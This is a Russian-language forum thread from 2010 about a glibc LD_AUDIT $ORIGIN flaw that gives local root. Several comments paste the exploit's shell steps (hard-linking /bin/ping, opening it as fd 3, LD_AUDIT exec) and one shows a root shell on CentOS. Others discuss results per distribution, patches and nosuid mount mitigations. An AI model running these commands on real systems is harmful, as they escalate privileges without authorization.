  • 2.59, User294 (ok), 17:55, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    Господи, что вы там курите если не понимаете разницы между ядром и либой привиле... весь текст скрыт [показать]
     
  • 2.68, Зилибоба (ok), 18:41, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    чтоб глупости в голову не лезли, нужно больше читать умных статей, например, http://www.microsoft.com/technet/security/advisory/2269637.mspx.
     
     
  • 3.79, Пользователь Debian (?), 19:34, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    "Server Error in '/technet' Application."

    Кажется, Вы запостили в этом URL'е эксплойт IIS!!!111

     
     
  • 4.108, Аноним (-), 00:30, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    точку в конце адреса убери
     
  • 4.109, Митра (?), 00:31, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    там точка в конце лишняя.
     
  • 3.93, User294 (ok), 22:26, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    А это вообще лулзов пачка Более того - была еще фича предложить юзеру скача... весь текст скрыт [показать]
     
     
  • 4.133, Добрый Аноним (?), 11:53, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    ага, щаз читайте сводки уязвимостей не только с опеннета и будете знать что та ... весь текст скрыт [показать]
     
     
  • 5.137, Зилибоба (ok), 13:42, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Во первых - была, а во вторых, пруф давайте ... весь текст скрыт [показать]
     
     
  • 6.144, Добрый Аноним (?), 14:37, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Во первых не была , такие баги постоянно появляются от приложения к приложению ... весь текст скрыт [показать]
     
  • 5.139, paxuser (?), 14:15, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Не в лунухах , а в Debian Этот дистрибутив давно себя зарекомендовал ... весь текст скрыт [показать]
     
     
  • 6.145, Добрый Аноним (?), 14:40, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    да какая разница главное, что это проблема не только вин система, как некоторые... весь текст скрыт [показать]
     
     ....нить скрыта, показать (13)

  • 1.27, Аноним (-), 16:31, 19/10/2010 [ответить] [показать ветку] [···]     [к модератору]  
  • +3 +/
    Особенно порадовало отношение разработчиков glibc бага есть - ну есть, ну и н... весь текст скрыт [показать]
     
     
  • 2.36, z (??), 16:45, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    линейкой по пальцам через интернеты =)
     
  • 1.29, savant (ok), 16:37, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Arch, при выполнении LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 шелл просто падает
     
  • 1.40, aNoN (?), 16:58, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    В funtoo тоже suid бит для хардлинка не выставляется, поэтому не работает. В debiane - лехко, но падает шелл.
     
     
  • 2.63, User294 (ok), 18:28, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    > В debiane - лехко, но падает шелл.

    Ога, с ассертом в libc.

     
  • 2.65, tamerlan311 (?), 18:34, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    в Дебиане давно используется eglibc вместо классической libc
     
     
  • 3.69, Sylvia (ok), 18:46, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    и несмотря на то, что eglibc всего лишь форк от glibc,
    в eglibc ( 2.11.2 ) эксплоит не работает.

     
  • 1.42, Аноним (-), 17:01, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    ~ $ mkdir /tmp/exploit
    ~ $ ln /bin/ping /tmp/exploit/target
    ~ $ exec 3< /tmp/exploit/target
    -bash: /tmp/exploit/target: Отказано в доступе


    gentoo ~x86_64

     
     
  • 2.71, Sylvia (ok), 18:56, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    suid бинарник на который делается линк должен быть читаемым
    mode 4755 например, если он нечитаем, но выполним, то exec 3 не пройдет.
     
  • 1.44, User294 (ok), 17:03, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    А "презренные бубунты" этот сплойт не пробирает. Посему странно ждать исправления для них - а они походу не эксплойтабельны и так?! Какой редхатчик новость писал? Он был не в курсе что в убунте/дебияне юзается другая либа - eglibc? Или какого буя про исправления написано? Пусть автор новости объяснит свою логику наведения паники? oO

    В бубунтах шелл просто убивается с assertion failed. И фигъ мне а не рут, соответственно. Так что приветы крЮтому редхату и Ульриху. Энтерпрайзнички, а на стандарт вот забили :-).

    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     
     
  • 2.55, Аноним (-), 17:30, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    с openSuSE аналогично - умирает шелл.
     
  • 2.56, anonymous (??), 17:31, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    >другая либа - eglibc

    Embedded GLIBC (EGLIBC) is a variant of the GNU C Library (GLIBC) that is designed to work well on embedded systems.

     
     
  • 3.61, User294 (ok), 18:19, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Спасибо, Кэп Но это не отменяет факта что приведенный эксплойт работает только ... весь текст скрыт [показать]
     
     
  • 4.162, solardiz (ok), 17:41, 20/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    Да, ошибаешься Тут дело не в glibc vs eglibc, а в опциях сборки -DNDEBUG убир... весь текст скрыт [показать]
     
  • 1.47, Аноним (-), 17:19, 19/10/2010 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    LD_AUDIT ORIGIN exec proc fd 3 bash proc 30974 fd 3 Permission deni... весь текст скрыт [показать]
     
     
  • 2.52, Аноним (-), 17:25, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    а, нет, вру, дескриптор перепутал, assert срабатывает LD_AUDIT ORIGIN exe... весь текст скрыт [показать]
     
  • 1.50, Аноним (-), 17:24, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
     
  • 1.54, прххффф (?), 17:30, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    На Debian не работает. Вывод: RedHat дырявый :-)

    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     
  • 1.57, Аноним (-), 17:39, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    в ubuntu 10.10:

    $ mkdir /tmp/exploit
    $ ln /bin/ping /tmp/exploit/target
    ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

     
     
  • 2.80, Sylvia (ok), 19:37, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    жесткую ссылку можно сделать в пределах 1 устройства, у вас наверное /tmp и /bin на разных партициях/устройствах
     
     
  • 3.84, val (??), 20:32, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    у меня тоже ubuntu 10.10. tmp и bin на одном разделе. то же самое выдает.
     
  • 1.64, Vasily Pupkin (?), 18:34, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] ==
     
  • 1.66, Аноним2 (?), 18:35, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    В основной ссылке по новости есть второй метод атаки
    http://seclists.org/fulldisclosure/2010/Oct/257

    Почему его еще никто не попробовал? Там ссылки
    делать не придется.

     
     
  • 2.70, Аноним (-), 18:53, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    пробовали не работает

    bash: line 28: /tmp/exploit/traget: No such file or directory

     
     
  • 3.76, Аноним2 (?), 19:15, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Что-то вы не то делаете видимо, но и у меня не получается Это как раз способ дл... весь текст скрыт [показать]
     
     
  • 4.88, Аноним (-), 21:38, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    funtoo, glibc-2.11-r1
    Assertion ... failed
     
  • 4.90, ozs (ok), 21:55, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    >>>$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &

    [1] 5559

    А что вот это [1] 5559 , у меня пишет такая команда не найдена.

     
     
  • 5.99, User294 (ok), 23:06, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Это Это - стопроцентный EPIC FAIL Хинт ввести выданные шеллом номер job... весь текст скрыт [показать]
     
     
  • 6.116, ozs (ok), 02:11, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Спасибо
    >>Иначе вы рискуете оказаться однажды в роли обезьяны с гранатой.

    От этого никто не застрахован.

     
  • 4.117, ozs (ok), 02:17, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    "[1] 5559"чей pid должен быть?
     
  • 2.74, Sylvia (ok), 19:08, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    sylvia evy var tmp pkill -n -t tty 124 sed s dev sleep -bash lin... весь текст скрыт [показать]
     
  • 2.78, AX (?), 19:21, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    После выполнения pkill warning debug option nonsense unknown try LD_DEBUG h... весь текст скрыт [показать]
     
  • 1.67, Vasily Pupkin (?), 18:41, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    У меня вообще ни на одной машине не получилось заэксплуатировать.
    1. У меня всё с SUID на отдельных разделах
    2. Всё с suid только на 111
    3. Даже когда я это всё пофиксил, всё равно вываливается ассёрт :]
     
  • 1.72, Al1966 (?), 18:57, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Fedora12 получилось. :(
     
  • 1.89, Добрый Аноним (?), 21:40, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +3 +/
    Вот, а кто-то мне тут рассказывал, что в линухах держать все на одном разделе можно спокойно, там людей не тревожат переполнения разделов, опции монтирования, а теперь не тревожат еще и всякие уязвимости....
    О безопасности думать надо, да.
     
  • 1.91, i (??), 22:02, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    чето облом на 2й же команде
    ln /bin/ping /tmp/exploit/target
    ln: создание жесткой ссылки «/tmp/exploit/target» => «/bin/ping»: Неверная ссылка между устройствами

    ладно создал в /home но опять же:
    ls -l /proc/$$/fd/3
    ls: невозможно получить доступ к /proc/18810/fd/3: Нет такого файла или каталога

    glibc-2.11.2

     
  • 1.97, balex (??), 22:37, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Опять этот SUID... Ну и как всегда о сто и одном способе "как получить линукс с правами обычного пользователя" тут не поведали. Те же юзеры, которые работают в удалённых xnix окружениях наверное и так бояться что-нить "уронить", конечно без дятлов никуда...
     
  • 1.103, Аноним (-), 00:06, 20/10/2010 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    andrey evilhorse var run exploit ls -ld drwxrwxrwx 2 andrey andrey 4096 Окт... весь текст скрыт [показать]
     
     
  • 2.105, Аноним (-), 00:13, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    если пофиксить права на /bin/ping:

    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

    и падение

     
  • 1.113, Аноним (-), 01:48, 20/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    тестовая система, собранна из исходников
    ./configure && make && make install
    , ни каких патчей безопасности - тот же ".. Assertion .."
     
  • 1.115, ifel (??), 02:08, 20/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    CO5 i386/x86_64 - пашет на ура
    CO4 - не работает

    На CO5 мы уже собрали rpms patched и разлили по серверам.

     
  • 1.124, d4r (?), 07:58, 20/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    мда, 2 ехплоита за один вечер, етот и http://www.exploit-db.com/exploits/15285. уид=0 на Linux box 2.6.34.7-56.fc13.i686 #1 SMP Wed Sep 15 03:33:58 UTC 2010 i686 i686 i386 GNU/Linux
     
     
  • 2.126, killer1804 (??), 08:35, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    user0 video_srv expl bin Linux kernel 2 6 30 RDS socket exploit ... весь текст скрыт [показать]
     
     
  • 3.127, Вова (?), 09:18, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    a out Linux kernel 2 6 30 RDS socket exploit by Dan Rosenberg ... весь текст скрыт [показать]
     
     
  • 4.128, korrado (?), 09:44, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    ls -l /bin/ping
    если для не юзера стоит r-x, эсплойт работает (Мандривы, Федоры, Убанты)
    если стоит, --x, то не работает (Слаки и другие)
     
     
  • 5.138, Вова (?), 13:45, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    в данной теме присутствуют два эксплойта, один скриптом вы о нём , другой прогр... весь текст скрыт [показать]
     
  • 1.132, АнонимМ (?), 11:48, 20/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Что-то в Red Hat Enterprise Linux Server release 5.1 (Tikanga) работать не хотит.

    bea@yam-ind:/tmp>gcc -w -fPIC -shared -o /tmp/exploit payload.c
    payload.c:7: ошибка: redefinition of ‘init’
    payload.c:2: ошибка: previous definition of ‘init’ was here

    glibc-2.5-18
    Что-то пока не страшно.

     
     
  • 2.134, ifel (??), 12:02, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Что-то у Вас в c file ошибка, а не работать не хочет Проверьте, что вставили в... весь текст скрыт [показать]
     
     
  • 3.146, АнонимМ (?), 14:41, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Да правда ваша - работает.
     
  • 1.135, TS (ok), 12:59, 20/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    Умные люди давно следуют рекомендациям по безопасности. например от NSA.
    Открываем "Guide to the Secure Configuration of Red Hat Enterprise Linux 5" - http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf - читаем -
    2.1.1.1.1 Create Separate Partition or Logical Volume for /tmp
    2.1.1.1.2 Create Separate Partition or Logical Volume for /var
    ...
    2.1.1.1.5 Create Separate Partition or Logical Volume for /home if Using Local Home Directories
    ...
    2.2.1.3 Add nodev, nosuid, and noexec Options to Temporary Storage Partitions
    2.2.1.4 Bind-mount /var/tmp to /tmp
    ...
    2.2.3.4 Find Unauthorized SUID/SGID System Executables
     
  • 1.148, буба (?), 15:31, 20/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Ubuntu 10.04:

    moo@moo:~$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     
     
  • 2.150, буба (?), 15:45, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    CentOS 5.3
    [moo@co53 ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    [root@co53 ~]#
     
     
  • 3.154, буба (?), 16:42, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    После "yum update glibc" с версии 2.5.34 до 2.5.49 и пересборки эксплоит все-равно работет на CentOS.
     
     
  • 4.190, буба (?), 18:41, 21/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Сегодня вышел апдейт glibc, после которого $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3  вырубает шелл.
     
  • 1.191, Аноним (-), 20:26, 21/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    I just can't create the link from /bin/ping to /tmp/exploit/target
    ln: creating hard link 'exploit/target' => '/bin/ping': Invalid cross-device link
     
  • 1.192, paxuser (ok), 00:18, 22/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Сегодня на #grsecurity:

    <taviso> kees: we pwned you :)
    <taviso> (check your mail)
    <kees> taviso: aaah craps
    <kees> taviso: nice work :)
    <taviso> thanks :D
    <spender> AHH CRAPS
    <kees> taviso: well, no worries, the glibc update was waiting in the wings anyway. I'll get it published. :)
    <spender> I INFERR THAT UBUNTU IS VULN TO THE GLIBC BUG
    <spender> and i guess all other eglibc users too? :p

     
     
  • 2.193, solardiz (ok), 02:33, 23/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Да, второй раунд: http://lists.openwall.net/full-disclosure/2010/10/22/15

    Исправление для Debian: http://lists.openwall.net/full-disclosure/2010/10/22/16

     
  • 1.194, Аноним (-), 06:07, 23/10/2010 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    ln bin ping tmp exploit target ln создание жесткой ссылки tmp exploit targe... весь текст скрыт [показать]
     
     
  • 2.195, paxuser (ok), 08:06, 23/10/2010 [^] [ответить]    [к модератору]  
  • +/
    > ln /bin/ping /tmp/exploit/target
    > ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

    Для эксплуатации второй уязвимости хардлинки не нужны.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor